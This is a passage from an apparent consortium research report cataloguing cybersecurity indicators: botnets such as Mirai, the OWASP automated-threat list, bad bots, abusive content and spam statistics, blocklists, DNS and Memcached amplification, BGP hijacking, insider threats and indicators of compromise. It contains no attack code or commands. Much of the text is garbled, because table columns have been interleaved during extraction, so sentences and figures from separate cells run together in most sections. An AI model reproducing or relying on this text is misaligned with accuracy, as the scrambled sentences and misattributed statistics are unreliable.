Threats automated by Mirai botnet and Exploitation of Mirai enslaved 600,000 software causing a newer variants: unmitigated vulnerable IoT devices divergence from Chalubo bot, Torii, vulnerabilities. Web at its peak88. The cost accepted behaviour DemonBot, Akiru, applications are was estimated to be producing one or more Katrina_V1, Sora, subjected to unwanted $13.50 per infected undesirable effects on Saikin, Owari, JoshoV3, automated usage – day device89. a web application, but Tokyo in, day out. Often excluding tool-based these events relate to exploitation of single- Reaper misuse of inherent issue vulnerabilities87. valid functionality and Malware that turns New DDoS launch can be commonly networked devices into platform, 0x-booter. mistakenly reported as attack tools as part of a application denial-of- large botnet using service (DoS) like HTTP- control and command. flooding. VPNFilter Botnet Targets networking It has impacted at least devices such as Linksys, 500,000 networking MikroTik, Netgear, and devices during the last TP-Link networking few years 90. equipment in the small and home office (SOHO) space.

7.5 OAT ontology Nomenclature List of OAT-001 Carding To provide actionable 75% of application threat events, for information and denial-of-service example, OWASP91 OAT-002 Token resources to help (DDoS) like HTTP- Cracking defend against flooding, is in fact automated threats to mistakenly reported. OAT-003 Ad Fraud web applications. The DDoS effect is a side-effect instead of OAT-004 Fingerprinting the primary intent, which are automated OAT-005 Scalping threats to web applications. In an OAT-006 Expediting exercise of attack traffic analysis on OAT-007 Credential darknets operated by Cracking SISSDEN what was conventionally OAT-008 Credential analysed as DDoS was Stuffing in fact and could be classified as ‘OAT-014

87 https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications 88 https://elie.net/blog/security/inside-mirai-the-infamous-iot-botnet-a-retrospective-analysis/ 89 https://www.theregister.co.uk/2018/05/09/berkeley_boffins_infect_things_with_mirai_in_a_good_cause/ 90 https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/vpnfilter-botnet-targets-networking-devices/ 91 OWASP Automated Threats to Web Applications - Threat Event Identification Chart v1.0 Copyright SAINT Consortium. All rights reserved. 63 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

OAT-009 CAPTCHA Vulnerability scanning’. Defeat Emanating from a OAT-010 Card Cracking known source of mass OAT-011 Scraping vulnerability scanning. OAT-012 Cashing Out OAT-013 Sniping OAT-014 Vulnerability Scanning OAT-015 Denial of Service OAT-016 Skewing OAT-017 Spamming OAT-018 Footprinting OAT-019 Account Creation OAT-020 Account Aggregation OAT-021 Denial of Inventory92

7.6 Bad bots

Nomenclature Examples Usage Metrics

Bad Bots generally Top 7 Bots Caught by DotBot - A web scraper 8,448,885,728 Bad provide no value to the Distil93 developed by Dotmic Bots detected website and include that scrapes product during a 30 day scrapers, spambots, DotBot listings and prices from snapshot94 and email harvesters. GiftGhostBot e-commerce websites. Bad bots consume Grapeshot bandwidth, slow down Seznam Bot GiftGhostBot - A bot servers, steal content MetaURI designed by hackers and crawl for PaperLiBot which is being used to vulnerabilities. Genieo defraud many gift card owners.

Grapeshot - A bot that uses probabilistic algorithms to assess the relative significance of keywords in pages and what users read.

92 https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications 93 https://www.distilnetworks.com/glossary/term/block-bad-bots/ 94 https://www.distilnetworks.com/bot-directory/ Copyright SAINT Consortium. All rights reserved. 64 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

8 Indicators - Abusive content Abusive content includes the following definitions: practicing abuse via websites and social media, Ill- treatment of others by coarse, insulting words or harmful acts, using ill treatment; injurious, improper, hurtful, offensive, reproachful. The indicators included here align with the taxonomy (as shown in Section 2 above) from ENISA/EC3 involving CSIRTs, LEAs, ENISA, and EC3, and shown within MISP 95:

• Spam (deceptive communications) • Harmful speech • Child/sexual/violence/... (child sexual abuse) Also included are related indicators:

• Cyberbullying, • Fake news (deceptive content)

Nomenclature Examples Usage Metrics

Abusive content via Government of law US - Foreign Sample results from emails, websites and enforcement officials Intelligence social media sources social media. Involving sometimes make Surveillance Act - FISA i.e. Facebook, Ill-treatment of others requests for data about governs how the U.S. Instagram, Messenger, by offensive words, people who use collects foreign Oculus and WhatsApp threats of violence, Facebook, Instagram, intelligence for – (As shown in the child sexual abuse, Messenger, Oculus and national security. The Figures 8-1 to 8-3 harmful acts, cyber WhatsApp, as part of Act created the Foreign below, actions taken stalking, racism, official investigations. Intelligence upon government discrimination, and The vast majority of Surveillance Court requests) – samples are threats against one or these requests relate (FISC). These courts from Jan to Jun 2018. more individuals. to criminal cases. In have the power to many of these cases, require companies or these government other private requests seek basic organizations to subscriber information, disclose information in such as name, foreign intelligence registration date and investigations. length of service. Other requests may also seek US National Security IP address logs or Letters - An account content96. administrative subpoena issued by the This section of Abusive FBI in an ongoing content, it is typified by national security the nature of investigation that remediation is compels a provider to generally only accepted produce a customer's

95 https://www.misp-project.org/taxonomies.html 96 https://transparency.facebook.com/government-data-requests/jan-jun-2018 Copyright SAINT Consortium. All rights reserved. 65 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

and acted upon by name, address, and government of law length of service. enforcement, requests or acations. It should be noted the large proportion (83% worldwide) – Government required social media accounts preserved (limited access awaiting formal governmental paperwork) are from US governmental sources e.g. FISA/FBI

Figure 8.2: Government required social media accounts (access locked and awaiting formal governmental paperwork to follow Figure 8.1: Government required content restrictions - Top 10 countries the initial request) - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018.

Figure 8.3: Top 10 countries - Facebook, Instagram, Messenger, Oculus and WhatsApp - Jan to Jun 2018 (government requests for access to social media accounts)

8.1 Spam (deceptive communications)

Nomenclature Examples Usage Metrics

Spam refers to the use This includes: instant Spamming remains Spamhaus anti-spam of electronic messaging message spam, search economically viable blocklist, the SBL, is systems to send out engine spam, blog because advertisers used by more than 1 unrequested or spam, Usenet have no operating costs billion Internet users unwanted messages in newsgroup spam, wiki beyond the and protects over 3 bulk. Spam is no longer spam, classified ads management of their billion user mailboxes, is singularly associated spam, Internet forum mailing lists, servers, based on the with email, also: spam, social media infrastructures, IP internationally accepted ¡ Link spam, spam, junk fax spam. ranges, and domain definition of Spam as spamdexing, tweet names, and it is difficult "Unsolicited Bulk spam, messaging spam Spam can be used to to hold senders Email"97. (text/SMS). spread computer accountable for their viruses, trojan horses or mass spam mailings. Average Daily Spam other malicious Volume is 383.29 billion, software 85.34% of all global Internet traffic98.

97 Spamhaus - 2018 - https://www.spamhaus.org/consumer/definition/ 98 Email & Spam Data - CISCO - Mar 2018 - https://www.talosintelligence.com/reputation_center/email_rep Copyright SAINT Consortium. All rights reserved. 67 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

8.2 Harmful speech

Nomenclature Examples Usage Metrics

Discreditation or There are many The EU’s “Framework Facebook revealed that discrimination of forms of speech that Decision on combating it deleted 865.8 million somebody (e.g. cyber can cause harm that certain forms and posts in the first stalking, racism and are not typically expressions of racism and quarter of 2018, the threats against one or included in xenophobia by means of vast majority of which more individuals) discussions of hate criminal law”100 were spam, with a speech, for example minority of posts incursions on Facebook defines and related to nudity, privacy, violent removes hate speech. A graphic violence, hate extremism online99 direct attack on people speech and terrorism. based on what is called protected characteristics – Facebook also said it race, ethnicity, national removed 583 million origin, religious affiliation, fake accounts in the sexual orientation, caste, same period. Of the sex, gender, gender identity accounts that and serious disease or remained, the company disability. They also provide said 3 percent to 4 some protections for percent were fake. immigration status. We define "attack" as violent or dehumanising speech, statements of inferiority, or calls for exclusion or segregation.101 8.3 Child/Sexual/Violence/... (child sexual abuse)

Nomenclature Examples Usage Metrics

Child sexual abuse, is The Council and the In the cyber security From IWF (Internet Watch a form of child abuse European Parliament field this topic of a Foundation)103 in 2017: in which an adult or adopted on 13 particular difficulty, older adolescent December 2011, a due to the nature of 132,636 uses a child for Directive on the subject and legal reports were processed sexual stimulation. combating the sexual restrictions in most (26% increase on 2016) Forms of child sexual abuse and sexual jurisdictions on abuse include exploitation of researchers unlawfully 78,589 engaging in sexual children and child accessing the content. URLs were confirmed as

99 Defining Hate Speech - Boston University School of Law; Berkman Klein Center for Internet & Society -2017 - https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2882244 100 “EU Framework Decision on Racism and Xenophobia” -Framework Decision 2008/913/JHA (Nov. 28, 2008), available at http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=uriserv%3Al33178 101 Facebook policy on Hate Speech - https://www.facebook.com/communitystandards/introduction 103 IWF - https://www.iwf.org.uk/ Copyright SAINT Consortium. All rights reserved. 68 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

activities with a child pornography, stepping Access to the content containing child sexual (whether by asking up the fight against is only permitted by abuse imagery, having or pressuring, or by child sexual abuse. trained individuals links to the imagery, or other means), within and authorised advertising it indecent exposure The Directive is a by law enforcement (of the genitals, comprehensive legal officers. 1,729 female nipples, etc.), framework which Newsgroup/ social media child grooming, or covers investigation instances were confirmed using a child to and prosecution of as containing child sexual produce crimes, assistance to abuse imagery. pornography. and protection of victims, and 86% increase in the use of prevention. Member disguised websites States, which in turn (hidden networks). These have to implement its are websites where the provisions in their child sexual abuse national laws. On 16 imagery will only be December 2016, the revealed to someone who Commission adopted has followed a pre-set two reports on the digital pathway – to measures taken by anyone else, they will be Member States to shown legal content. combat the sexual abuse and sexual An increasing amount of exploitation of child sexual abuse children.102 imagery is being hosted in Europe, rather than North America – the trend continues from 2016 and the gap widened.

8.4 Cyberbullying

Nomenclature Examples Usage Metrics

Cyberbullying is a Cyberbullying is a ● Sending mean From a nationally practice where an prosecutable offense in messages or threats representative sample individual or group uses some jurisdictions, but a to a person’s email (20,000) of 12-17-year- the Internet to ridicule, globally uniform legal account or cell old middle and high harass or harm another approach has not yet phone school students in the person. The social and been established. ● Spreading rumours US105. emotional harm online or through inflicted by cyberbullies COFACE Families Europe texts ● 33.8% cyberbullied grows out of - or leads coordinated the ● Posting hurtful or in their lifetime

102 Child sexual abuse - https://ec.europa.eu/home-affairs/what-we-do/policies/organized-crime-and-human- trafficking/child-sexual-abuse_en 105 Cyberbullying Research Center - 2016 - https://cyberbullying.org/2016-cyberbullying-data Copyright SAINT Consortium. All rights reserved. 69 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

to - physical bullying in European Awareness threatening Within 30 days before the offline world. Raising Campaign on messages on social interview / survey Cyberbullying networking sites or #DeleteCyberbullying web pages ● 16.9% cyberbullied from February 2013 to ● Stealing a person’s ● 22.5% with mean or July 2014. The project account information hurtful comments was financed under the to break into their online Daphne III programme account and send ● 12.2% Physically of the European damaging messages threatened online Commission104. ● Pretending to be ● 12.7% sexting someone else online to hurt another EU Kids Online 2014 person report found that 6 % of ● Taking unflattering 9 to 16-year-olds report pictures of a person having been bullied and spreading them online across Europe106 through cell phones or the Internet ● Sexting, or circulating sexually suggestive pictures or messages about a person

8.5 Fake news (deceptive content)

Nomenclature Examples Usage Metrics

Fake news, deceptive Misinformation is false As shown in the US Over 60 percent of content, or often or inaccurate federal indictment – to respondents in a recent referred as fake news information that is defraud the United survey believed that the websites are Internet mistakenly or States by impairing, ‘fake news’ headline, websites that inadvertently created or obstructing, and claiming the Pope deliberately publish spread; the intent is not defeating the lawful released a statement in hoaxes, propaganda, to deceive. functions of the support of the and disinformation government through Republican candidate purporting to be real Disinformation is false fraud and deceit for the (Trump), was somewhat news. This is often using information that is purpose of interfering social media to drive deliberately created and with the U.S.

104 COFACE Families Europe coordinated the European Awareness Raising Campaign on Cyberbullying - 09 2017 - https://deletecyberbullying.wordpress.com/ 106 EU Kids Online 2011 report - 2011 - http://www.lse.ac.uk/media@lse/research/EUKidsOnline/EU%20Kids%20II%20(2009- 11)/EUKidsOnlineIIReports/Final%20report.pdf

web traffic and amplify spread "in order to political and electoral or very accurate109. their effect. Fake news influence public opinion processes, including the websites deliberately or obscure the truth" presidential election of Facebook and Google seek to be perceived as 2016.107 now would ban ads legitimate and taken at Disinformation cyber- from sites with face value, often for warfare - nation-state Fake news and deceptive content, financial or political attacks using fake news, deceptive content are including fake news, and gain. aiming for intangibles, now seen as active in review publishers for with economic, political, many countries’ election compliance.110 and social impact processes. 108 Officials from 11 countries held a met in Helsinki in November 2016, in order to plan the formation of a centre to combat disinformation cyberwarfare including spread of fake news on social media111

107 https://www.justice.gov/file/1035477/download 108 https://en.wikipedia.org/wiki/Fake_news#Fake_news_by_country 109 https://www.statista.com/topics/3251/fake-news/ 110 https://www.nytimes.com/2016/11/15/technology/google-will-ban-websites-that-host-fake-news-from-using-its- ad-service.html 111 https://yle.fi/uutiset/osasto/news/helsinki_to_host_hub_aimed_at_curbing_cyber_warfare_threats/9307244 Copyright SAINT Consortium. All rights reserved. 71 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

9 Blacklists, Blocklists and Whitelists - Open Source Methodologies A list of known and regularly referred to backlists / blocklists / Domain Name System-based Blackhole List (DNSBL) or Real-time Blackhole List (RBL) are shown in Annex A and B. It should be noted individual nation states operate nationwide blocklists. As of September 2016, more than 6,000,000 websites were blocked in mainland China under the country's Internet censorship policy112.

Nomenclature Examples Usage Metrics

A blacklist is an access Blacklists, Blocklists and There are thousands of 80% of spam received control system that Whitelists are used on blacklists, blocklists (see by Internet users in denies entry to a every Internet server Annex A) in operation North America and specific list (or a defined ‘firewall’ and spam around the world. Also, Europe can be traced via range) of users, filter. there are many privately aliases, addresses, programs, or network managed blacklists. The redirects, locations of addresses. Many Internet ISPs and two best known are113: servers, domains and webmasters use custom DNS setups, to around Block List (DBL) is a real Blacklists, Blocklists and SpamCop 100 known spam time database of spam Whitelists based upon operations listed in the domains including spam client behaviour, This blacklist adds IP ROKSO database. payload URLs, spam adapted from available addresses to its list sources and senders, blacklists. based on the ratio of This would be 72% of all known spammers and spam complaints to global Internet traffic. spam gangs, as well as PC and network owners volume of emails sent. phish, virus and have the ability to use a An IP address can be Also see 4.7 Spam malware-related sites. ‘Hosts File’ which is a added and removed self-determined several times even Domain Name System blacklist. It is an during a 24-hour period Blacklists, also known as operating system file depending on the DNSBL's or DNS that maps hostnames to frequency of sampling Blacklists, are spam IP addresses. It is a plain by SpamCop. blocking lists that allow text file. Originally a file a website administrator named HOSTS.TXT SpamHaus to block messages from specific systems that Also see 4.7 Spam This is a popular and have a history of free blacklist used by sending spam or ISPs and corporate malware. networks worldwide. SpamHaus also runs A whitelist is a generic ROKSO (Register of name for a list of email Known Spam addresses or IP Operations)114 that lists addresses that are spammers who have

112 Websites blocked in mainland China - https://en.wikipedia.org/wiki/Websites_blocked_in_mainland_China#cite_note-GreatFire.org-1 113 How and why ISPs block emails - https://help.campaignmonitor.com/how-why-isps-block-emails 114 The Register of Known Spam Operations database is a depository of information and evidence on known persistent spam operations, assembled to assist service providers with customer vetting and the Infosec industry with Actor Attribution. - 04 2018 - https://www.spamhaus.org/rokso/ Copyright SAINT Consortium. All rights reserved. 72 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

considered to be spam been terminated three or malware free. or more times by ISPs. Whitelists are used frequently with e-mail applications to allow users to compile lists of senders they wish to receive emails from. This list overrides any blacklists and spam filters and allows the emails to be delivered to the user’s inbox instead of being filtered out at the firewall level.

10 Indicators - Insecurity There are many elements of insecurity within ICT (information and Communications Technology). According to SAINT research the five indicators described here are the most relevant within current cyber security practices/research. 10.1 DNS - Misconfigured open resolvers (DDos & DrDos)

Nomenclature Examples Usage Metrics

DNS amplification is a See 4.4 Denial Of service From late 2018 See 4.4 Denial Of service Distributed Denial of (DoS, DDoS, DrDoS) Memcached (DoS, DDoS, DrDoS) Service (DDoS) amplification method amplification, in which attacks have emerged. Security researchers at the attacker exploits Cloudflare, Arbor vulnerabilities in domain Malicious actors have Networks, and Chinese name system (DNS) started abusing the security firm Qihoo 360 servers to turn initially Memcached protocol to noticed that hackers are small queries into much launch distributed DDoS now abusing larger payloads, which / DrDos) attacks. "Memcached" to are used to bring down amplify their DDoS the victim’s servers. Memcached is a free attacks by an and open source unprecedented factor of DNS amplification is a distributed memory 51,200 type of reflection attack caching system which manipulates designed to work with a Memcached reflection publicly-accessible large number of open attacks recorded, domain name systems, connections. Clients can worldwide, at an making them flood a communicate with average of 2,700/day – target with large Memcached servers via over a 30 day period quantities of UDP TCP or UDP on port Jan/Feb 2019 packets. Using various 11211115 amplification techniques, perpetrators can “inflate” the size of these UDP packets, making the attack so potent as to bring down even the most robust Internet infrastructure.

115 Memcached Abused for DDoS Amplification Attacks - 02 2018 - https://www.securityweek.com/memcached- abused-ddos-amplification-attacks Copyright SAINT Consortium. All rights reserved. 74 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Figure 10.1: Location of Memcached protocol servers (Arbor Networks)

Figure 10.2: Memcached amplification attacks recorded 30 days (DDoSMon)116 10.2 BGP – Hijacking, outages, leaks

Nomenclature Examples Usage Metrics

BGP (Border In April 2018 a BGP Hijack of As a result of BGP In 2017 there were: Gateway Amazon DNS was enacted to hijacking, Internet Protocol) - steal crypto currency. traffic can go the • 13,935 total incidents BGP hijacking wrong way, be (either outages or is when eNet/XLHost (AS10297) a US monitored or route hijacks) attackers based host suffered a breach intercepted, be 'black • Over 10% of all maliciously enabling attackers to holed,' or be directed Autonomous Systems reroute impersonate Amazon’s to fake websites as on the Internet were Internet authoritative DNS service. part of a man-in-the- affected traffic. middle attack. In • 3,106 Autonomous

116Memcached amplification attacks recorded 30 days https://ddosmon.net/memcached_amplification_attack Copyright SAINT Consortium. All rights reserved. 75 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Attackers These attackers used AS10297 addition, spammers Systems were a victim accomplish to announce five routes used by can use BGP hijacking, of at least one routing this by falsely Amazon’s DNS. MyEtherWallet or the network of an incident announcing eventually issued an AS that practices BGP • 1,546 networks ownership of announcement acknowledging hijacking, in order to caused at least one groups of IP that many of the users of their spoof legitimate IPs for incident118 addresses, cryptocurrency service had been spamming and data called IP redirected to a fraudulent site. theft purposes. prefixes, that they do not Most of the funds ended up actually own, within the anonymous attacker’s control, or cryptocurrency wallet, showing route to. cryptocurrency transactions worth $17.3M USD had been stolen117.

10.3 Insider threat (malicious and accidental)

Nomenclature Examples Usage Metrics

An insider threat is Insider threat detection Insider threats include: The top three risk generally defined as a has become an sabotage, theft, factors enabling the current or former important factor: espionage, fraud, insider threat employee, contractor, theft of materials, and vulnerability are: or other business The US National mishandling physical partner who has or had Industrial Security devices. ● excessive access authorized access to an Program Operating privileges (37%) organization's network, Manual (NISPOM), Insiders do not always ● endpoint access system, or data and which provides baseline act alone and may not (36%), intentionally standards for the be aware they are aiding ● information misused that access to protection of classified a threat actor (i.e. the technology negatively affect the information, signed by accidental insider complexity (35%). confidentiality, integrity, President Obama in threat). or availability of the September 2011, Within this insider organization's Executive Order 13587, threat study120: information or requires federal information systems. agencies that operate or access classified computer networks to ● 53% confirmed that implement insider an insider attack threat detection and had happened at their organization in

117 https://blogs.oracle.com/internetintelligence/bgp-hijack-of-amazon-dns-to-steal-crypto-currency 118 https://bgpstream.com/ 120 Insider Threat Report - 2018 - http://crowdresearchpartners.com/wp-content/uploads/2017/07/Insider-Threat- Report-2018.pdf

prevention programs.119 the last year.

Competitive advantage is often the goal through abusing access rights.

10.4 Physical manipulation / damage / theft / loss

Nomenclature Examples Usage Metrics

Intentional actions (non- 2008, hackers accessed STUXNET, was the Analysis of EU industrial fulfilment or defective a Turkish pipeline world’s first digital clients for physical fulfilment of personal through surveillance weapon. Stuxnet damage of IT networks duties) aimed to cause camera software and targeted SCADA systems and infrastructures: disruption or damage of caused an explosion by and was responsible for IT Assets. super pressurizing the causing substantial 30% interviewed - see oil in the pipeline after physical manipulation malicious parties Act of physically damage shutting down its and damage to Iran's disrupting physical of IT Assets alarms. nuclear program122. operations - therefore EU industrial clients on Taking of another 2009, a former Usage of manipulation “physical damage of IT person's computing employee was & damage could be networks and hardware property, responsible for a made to any physical infrastructures” was which often contain computer intrusion of a entity connected to the seen as the 2nd highest sensitive data. This can large power company in Internet. See examples. cyber risk, with data be in the form of mobile Texas US, that crippled breaches as 1st123 devices for example the company’s energy laptops, smartphones, forecast system and tablets. incurring more than $26,000 in damages. Threats of bombing or other actions against IT In 2014, the German infrastructures now Federal Office of counts as a terrorist’s Information Security attack, and if from a announced that hackers nation state, this is an had gained access to a act of war. German steel factory’s production networks and caused system

119 Designing Insider Threat Programs - 2014 - https://insights.sei.cmu.edu/sei_blog/2014/09/designing-insider- threat-programs.html 122 STUXNET, THE WORLD'S FIRST DIGITAL WEAPON - 2014 - https://www.wired.com/2014/11/countdown-to-zero- day-stuxnet/ 123 Bridging the cyber-risk gap - 2017 https://www2.chubb.com/uk-en/_assets/documents/uk7279-jd-10_17-bridging- the-cyber-risk-gap_lowres.pdf Copyright SAINT Consortium. All rights reserved. 77 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

components to fail by tampering with the controls of its blast furnace.

2015, hackers obtained control of a power grid in western Ukraine, opening up circuit breakers and knocking out power stations.

2017, hackers infiltrated an Austrian hotel’s electronic key system, locking guests out of their rooms and forcing the hotel to give in to the hackers’ ransom demand.

Just before President Trump’s inauguration, hackers tampered with 70% of storage devices that record data from police surveillance cameras in Washington, D.C., “forcing major citywide reinstallation efforts.”121

121 Insurance Coverage Issues Created by The Internet - 02 2018 - https://www.lexisnexis.com/lexis-practice- advisor/the-journal/b/lpa/archive/2018/02/28/insurance-coverage-issues-created-by-the-internet.aspx Copyright SAINT Consortium. All rights reserved. 78 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

10.5 Information leakage

Nomenclature Examples Usage Metrics

Information Leakage is The Home Depot lost a One of the most There are 6 key metrics an application weakness laptop containing publicized data-leak to measure the maturity where an application personal information on victims: TJX. For the and effectiveness of a reveals sensitive data, 10,000 employees, one attack TJX accept Data Loss Prevention such as technical details of a string of high- responsibility. (DLP) program (this can of the web application, profile data-leak also be used to environment, or user- incidents124. e.g. TJX should not have determine the risk or if specific data. Sensitive stored un-encrypted a data breach is data may be used by an ● The Veterans magnetic stripe underway): attacker to exploit the Administration information in their ● Number of policy target web application, ● TJX databases, this is a exceptions granted its hosting network, or ● Monster.com flawed storage policy. for any defined time its users. ● Fidelity National TJX did not realize they period Information Services were putting personal ● Number of False Information leakage ● Pfizer information at risk. positives generated should not be confused ● AOL for any defined time with Data Breaches (see ● Ameritrade period 4.10) ● Mean time to respond to any DLP alerts ● Number of unmanaged devices in your network handling sensitive data ● Number of databases not yet fingerprinted ● Number of databases and data residents not yet classified 10.6 Vulnerabilities

Nomenclature Examples Usage Metrics

Vulnerability is a cyber- The Top 10 examples of Inevitably, all operating A vulnerability in IIS, security term that refers security vulnerabilities systems contain detailed in Microsoft to a flaw in a system within the OWASP Top vulnerabilities and Security Bulletin MS01- that can leave it open to 10 (see 4.3.1 above are: exposures which can be 033, is one of the most attack. A vulnerability targeted by hackers and exploited Windows

124 Five data leak nightmares - 2008 - https://www.networkworld.com/article/2289232/lan-wan/five-data-leak- nightmares.html Copyright SAINT Consortium. All rights reserved. 79 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

may also refer to any ● SQL Injection virus writers. Although vulnerabilities ever. A type of weakness in a ● Cross Site Scripting Windows vulnerabilities large number of computer system itself, ● Broken receive the most network worms have in a set of procedures, Authentication and publicity due to the been written over the or in anything that Session Management number of machines years to exploit this leaves information ● Insecure Direct running Windows. vulnerability, including security exposed to a Object References ‘CodeRed’. CodeRed threat. ● Cross Site Request was first detected on Forgery July 17th 2001 and is ● Security There are many believed to have Misconfiguration exploited vulnerabilities infected over 300,000 ● Insecure also within the Unix targets. It disrupted a Cryptographic world, which target large number of Storage software packages such businesses and caused ● Failure to restrict as SSH, Apache, WU- huge financial losses URL Access FTPD, BIND, around the world. ● Insufficient Transport IMAP/POP3, various Although Microsoft Layer Protection parts of the kernels etc. issued a patch for the ● Unvalidated vulnerability along with Redirects and the MS01-033 security Forwards bulletin, some versions of the CodeRed worm are still spreading throughout the Internet125.

10.7 False positives

Nomenclature Examples Usage Metrics

False positives are files Technology that A deliberate false At large enterprises or behaviour flagged as doesn’t properly positive is, for example, worldwide it was found malicious when they recognize real threats. EICAR test file, that 37 percent of are not. developed by the respondents receive Alert overload can lead European Institute for more than 10,000 to Alert Fatigue. Computer Antivirus alerts each month. Of Research to verify the those alerts, 52 response of antivirus percent were false programs without positives126. It costs at having to use real $1.3 million a year to malware. Investigate false positives or 21,000 hours of wasted time

125 Vulnerabilities examples - https://securelist.com/threats/vulnerabilities-examples/ 126 https://www.fireeye.com/blog/products-and-services/2017/06/eliminate-alert-fatigue.html Copyright SAINT Consortium. All rights reserved. 80 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

11 IOCs Indicators of Compromise Indicators of compromise (IOCs) are “pieces of forensic data, such as data found in system log entries or files, that identify potentially malicious activity on a system or network” Indicators of compromise aid information security and IT professionals in detecting data breaches, malware infections, or other threat activity.

Nomenclature Examples Usage Metrics

Pieces of forensic data See Sections 13.1 to • Detect intrusion See Sections 13.1 that cumulatively 13.16 below attempts or other to 13.16 below indicates a computer malicious activities. intrusion. • Better analyze a particular malware’s techniques and behaviours

Provide actionable threat intelligence that can be shared within the community

The following 16 tables are the current specific and generally accepted indicators of compromise. By monitoring for indicators of compromise, organizations can detect attacks and act quickly to prevent breaches from occurring or limit damages by stopping attacks during earlier stages.

11.1 Insider threat

Nomenclature Examples Usage Metrics

An insider threat can • Unauthorized Loss or theft of data The average cost of an come from a current or download or insider threat annually former employee, a copying of sensitive is $8.76 million board member, or data, (2017)127. anyone who has ever • Taking and keeping had access to an critical sensitive organisation’s information in proprietary or home confidential • Operating information including: unauthorized Contractors, Business equipment (such as associates, Third cameras, recording parties, Individuals who devices, mass

127 https://www.observeit.com/ponemon-report-cost-of-insider-threats/ Copyright SAINT Consortium. All rights reserved. 81 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

have knowledge of an storages, internet organisation’s security access points, etc.) practices, confidential • Asking other information or access employees for their to protected networks credentials or databases. • Accessing data that has little to no relation to present role at the company

11.2 Unusual outbound network traffic (egress)

Nomenclature Examples Usage Metrics

Unusual traffic patterns Outbound connection Data exfiltration, data 225 out of 315 IT teams leaving the network counts, user, extrusion, data surveyed used egress bandwidth, count of exportation or data filtering in 2017/18128 unique destinations, theft for malicious large file transactions purposes to provide evidences of data theft or bandwidth abuse

11.3 Anomalies in privileged user account activity

Nomenclature Examples Usage Metrics

Escalation of privileges Anomalies in privileged To gain unauthorised 55% of cybersecurity of accounts or means user account activities access to sensitive professionals surveyed of access to other Log in failures data, create new thought Privileged IT accounts with higher Authentication failures accounts, delete users/admins posed privileges Unusual login times information, cause the biggest security risk Type of information malicious damage. to organisations129. accessed Prevention through Privilege misuse is 5th user behaviour out of the top 9 most analytics likely threats130

128 https://www.sans.org/cyber-security-intelligence/2018/11/13/its-awfully-noisy-out-there-results-of-the-2018- sans-incident-response-survey 129 https://www.ca.com/content/dam/ca/us/files/ebook/insider-threat-report.pdf 130 https://enterprise.verizon.com/resources/reports/DBIR_2018_Report_execsummary.pdf Copyright SAINT Consortium. All rights reserved. 82 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

11.4 Geographical irregularities

Nomenclature Examples Usage Metrics

Unusual patterns in An account logging in For malicious purpose Cyber espionage is 6th geographic from different IPs including data theft out of 9 on the list of connections around the world including gaining access top threats from to sensitive data. Verizon131 Connections to countries with no Used as an indicator in business relationships threat hunting. Use blacklists or blackholes to isolate suspicious activity.

11.5 Log-in red flags

Nomenclature Examples Usage Metrics

Unusual log in patterns Failed logins using user To gain unauthorised 45% of security and activities accounts that don't network access. analysts used unusual exist, attempted and log in patterns and successful log-in Monitor with a baseline activities as an IOC in activity after hours, for normal activity. 2017132

Brute force attacks

11.6 Increases in database read volume

Nomenclature Examples Usage Metrics

Spikes in database read Evidence of existing Threat hunting Within the Sony data volumes system intrusion indicator detected breach post analysis using database auditing there was a 24-40% and forensics. increase in database read volumes. Which had gone unnoticed133.

11.7 HTML response sizes

Nomenclature Examples Usage Metrics

131 https://enterprise.verizon.com/resources/reports/DBIR_2018_Report_execsummary.pdf 132 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf 133 https://www.academia.edu/23717709/Sony_Information_Security_Case_study

Unusually large A HTML response size SQL injection to extract HTML Response Size response HTML that is normally around data through a Web was used by 44% of requests sent from a 260 KB rises to 50MB, Application threat hunters as an web application for example IoC134. Threat hunting IOC via 500 Internal Server web logs. Errors and 501 Header Value errors in the Log analyzers & SIEM Web Server Logs provide automated tools and analysis of HTML responses

11.8 Large numbers of requests for the same file

Nomenclature Examples Usage Metrics

Unusual patterns or A high volume of Malicious purposes, 46% of security spikes in requests for requests for a single data theft, cyber analysts used spikes in the same file file for example a single espionage, etc. requests for the same user or IP making 500 file as an IOC in 2017135 requests for 'join.php,’ Used as forensic evidence in threat hunting

11.9 Mismatched port-application traffic

Nomenclature Examples Usage Metrics

An application using an A DNS request masks Attackers use common Mismatched Port unusual port. Can be an infected host (HTTP, HTTPS, SSL/TLS Application Traffic is inbound or outbound. communicating via for or DNS) or custom one of the top 15 IOCs example port 80. protocols for illicit Examples of standard Command and Control ports are 80-TCP (C2) channels. (HTTP), 443-TCP (SSL/ Attackers can use TLS), 53-UDP (DNS). combinations of protocols and ports, e.g.: Common Protocol + Common Port Common Protocol + Uncommon Port Custom Protocol + Common Port Custom Protocol +

134 https://resources.infosecinstitute.com/category/enterprise/threat-hunting/iocs-and-artifacts/threat-hunting-and- html-response-size/ 135 https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-sept-2017.pdf Copyright SAINT Consortium. All rights reserved. 84 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

